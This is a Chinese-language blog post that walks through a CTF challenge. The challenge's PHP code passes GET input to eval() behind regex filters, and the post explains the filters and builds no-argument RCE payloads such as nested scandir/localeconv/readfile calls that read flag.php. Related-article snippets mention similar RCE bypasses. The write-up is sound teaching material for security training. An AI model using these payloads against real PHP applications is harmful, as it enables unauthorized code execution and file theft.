无参数RCE

最新推荐文章于 2024-04-10 16:31:45 发布
最新推荐文章于 2024-04-10 16:31:45 发布
阅读量2.1k 收藏 1
点赞数 3
分类专栏: 渗透测试 BUUCTF RCE 文章标签: php RCE 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/120584774
版权
渗透测试 同时被 3 个专栏收录
82 篇文章 18 订阅
订阅专栏
BUUCTF
30 篇文章 0 订阅
订阅专栏
RCE
10 篇文章 0 订阅
订阅专栏

 [GXYCTF2019]禁止套娃

<?php
include "flag.php";//执行并包含flag.php
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){//以get方式提交exp,非空且为字符串
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

第一个

正则表达式将会过滤data://,filter://,php://,phar://等伪协议读取flag.php

php中的!号作用通俗点理解就是否定的意思 比如: a==b 表示a要等于b, !a==b 表示a不等于b

pret_match()函数是正则表权达式匹配, 匹配成功就返回true, 匹配不成功就返回false 前面加个!那就需要这个函数返回false, 也就是没有匹配上

第二个

preg_replace()函数,preg_replace('/[a-z,]+((?R)?)/', NULL, $GET['exp']),主要功能就是限制我们传输进来的必须是纯小写字母的函数,而且不能携带参数

第三个

则直白的过滤了et|na|info|dec|bin|hex|oct|pi|log

一三两个规则很好理解,关键在于第二个preg_replace()函数的具体作用,也就是无参数函数校验

什么是无参数函数RCE

当我们有eval($_GET['exp']);时,代表着拥有了一句话木马,可以getshell,但是如果有以下限制时,我们使用的参数则无法通过校验

if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {    
    eval($_GET['exp']);
}

preg_replace()函数,将会执行一个正则表达式的搜索与替换,当$pattern也就是/[a-z,_]+((?R)?)/时,替换为null值,这里需要传入的参数为小写字母,且不能携带参数。只能匹配通过无参数的函数

“+”表示匹配前面的子表达式一次或多次(大于等于1次)。例如,“gy+”能匹配“gy”以及“gyy”

(?R) : 表示当前表达式(/[a-z,_]+((?R)?)/)一直递归

(?R)?表示递归整个匹配模式零次或者一次

所以preg_replace('/[a-z,]+((?R)?)/', NULL, $GET['exp'])大致含义就是匹配无参数的函数,但是内部可以无限嵌套相同的模式

print_r(scandir('a()'));可以执行
print_r(scandir('a(b(c()))'));可以执行
print_r(scandir('123'));不可以执行
___________________________________________________________
所以这个正则只会匹配到
a();
a(b(c()));
带上参数比如system('ls /');是无法执行的,我们只能使用没有参数的函数来进行远程代码执行

在phpstudy的www下创建一个php文件:

<?php
print_r(scandir('.'));
?>

访问:

既然这样,利用scandir('.')即可尝试查看flag,可惜失败了

scandir() 读取当前目录下的所有文件,但是由于只能使用没有参数的函数来进行远程代码执行,那么'.'如何绕过呢?

这里引入两个函数

  1. localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.

  2. current()函数 返回数组中的当前单元, 默认取第一个值

  3. 将第一个函数套入第二个函数,也就是current(localeconv()),这样就永远返回'.'

构造payload:

?exp=print_r(scandir(current(localeconv())));

既然查看到flag.php在倒数第二个数组内,只要解决如何查看的问题即可提交flag

  1. array_reverse()以相反的元素顺序返回数组

  2. next()函数将数组中内部指针向前移动一位

构造payload:

?exp=print_r(next(array_reverse(scandir(current(localeconv())))));

如何读取flag?

  1. readfile()

  2. highlight_file()

构造payload(都可得flag):

  1. ?exp=print_r(readfile(next(array_reverse(scandir(current(localeconv()))))));

  2. ?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

bbb07
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
初探无参数RCE
weixin_46330722的博客
12-07 2657
概念 所谓无参数RCE,就是通过没有参数的函数达到命令执行的目的。这类题目的关键代码一般长这样,后面都用这串代码当题目测试 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) { eval($_GET['exp']); } ?> 简单解释一下这串代码。这串代码就是检查了我们通过GET方式传入的exp参数的值,如果传进去的值是传进去的值是一个字符串接一个(),那么这个字符串就会被替换为空
参数rce
qq_45570082的博客
06-07 2034
总结一下无参数rce的各种解法(为了便于自己查找,同时为了把自己收藏夹的几个相关网址删掉,每次都在别人博客找很麻烦的(手动狗头)) 首先准备代码 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['a'])) { eval($_GET['a']);} 利用session_id php中有一个函数叫session_id(),可以直接获取到cookie中的phpsessionid值,phpsessionid的组成符号有
无参rce总结
最新发布
weixin_66839513的博客
04-10 653
if(';R)?正则表达式 [^\W]+\((?R)?\) 匹配了一个或多个(表示函数名),后跟一个括号(表示函数调用)。其中 (?R) 是递归引用,它只能匹配和替换嵌套的函数调用,而不能处理函数参数。使用该正则表达式进行替换后,每个函数调用都会被删除,只剩下一个分号;,而最终结果强等于;时,payload才能进行下一步。简而言之,无参数rce就是不使用参数,而只使用一个个函数最终达到目的。
参数函数RCE
weixin_53146913的博客
07-19 1715
1.利用超全局变量进行bypass,进行RCE 2.进行任意文件读取
参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
non_RCE
03-12
在IT行业中,"RCE"通常指的是"远程代码执行"(Remote Code Execution),这是一种非常严重的安全漏洞,允许攻击者在目标系统上执行任意代码。"non_RCE"这个标题可能是暗示我们正在处理一个与RCE漏洞不同的问题或者是...
phpstudy后门rce批量利用脚本的实现
10-15
`write_shell`函数是核心功能,它接收URL和请求头作为参数,尝试连接并检测是否存在后门。如果返回的响应中包含了`echo`命令的输出,那么就认为后门存在并成功利用。此外,脚本还提供了将成功利用的URL记录到文件`...
Yii 框架反序列化 RCE 利用链 2(官方无补丁)1
08-03
5. 在 `UnicodeString` 的 `__wakeup` 方法中,`normalizer_is_normalized` 方法被调用,其参数是 `$this->string`,这个值是 `LazyString` 的实例。 6. `LazyString` 的 `__toString` 方法被调用,这将执行 `$this-...
RCE.rar_coulomb matlab_rce_拓扑势_概率神经网络
09-23
文件“RCE.m”很可能就是用MATLAB编写的一个RCE网络的实现脚本,可能包含了网络的定义、训练过程、参数调整以及结果分析等功能。 在构建RCE网络时,通常需要考虑以下关键步骤: 1. **网络结构设计**:确定网络的层...
RCE参数构造
nobugnomoney的博客
05-24 1319
一、RCE参数构造 无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果,这在ctf中也算是一个比较常见的考点,接下来就来详细总结总结它的利用姿势。 核心的代码 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 也就是说只能传入函数(),但是()里面能有参数,要是有参数的话最终的返回值不是;就不能进行匹配。例如传入A
初学无参数RCE
m0_62709637的博客
05-12 511
前置知识: 1、文件读取函数: show_source(): highlight_file():对文件进行语法高亮显示; readfile(): file_get_contents(): file(): tips:show_source()和highlight_file()函数无法直接在页面输出需要配合echo()等函数一同使用; 2、写题时常用的输出函数: print_r(): var_dump(): echo(): 3、无参数rce常见正则匹配 1、'/[^\W]+\((?R)?\
无参函数的RCE
silence1_的博客
10-31 2384
无参函数的RCE 最近遇到挺多rce的题,这里记录一下关于无参函数的rce。 先看看代码: <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); } ?> 很明了,...
无参 RCE
snowlyzz的博客
08-07 592
无参rce
Byte CTF boring_code(fuzz,无参数RCE)
a3320315的博客
11-09 1893
0x01 贴出代码 <?php function is_valid_url($url) { if (filter_var($url, FILTER_VALIDATE_URL)) { if (preg_match('/data:\/\//i', $url)) { return false; } return true; } return false; } if (is...
php无参数函数实现rce,PHP Parametric Function RCE
weixin_42303721的博客
04-02 507
前言最近做了一些 php 无参数函数执行的题目,这里做一个总结,以便以后 bypass 各种正则过滤。大致思路如下:1. 利用超全局变量进行 bypass,进行 RCE2. 进行任意文件读取什么是无参数函数 RCE传统意义上,如果我们有:eval ( $_GET [ ’ code ’ ] ) ;即代表我们拥有了 " 一句话木马 ",可以进行 getshell,例如:但是如果有如下限制:if ( ’...
深入浅出带你学习无参RCE
老司机的后备箱
02-16 701
最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。
参数RCE绕过的详细总结(六种方法)
2301_76690905的博客
10-26 2956
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
php RCE常用函数
08-26
- *1* *2* *3* [浅谈无参数RCE](https://blog.csdn.net/weixin_30568317/article/details/116284685)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值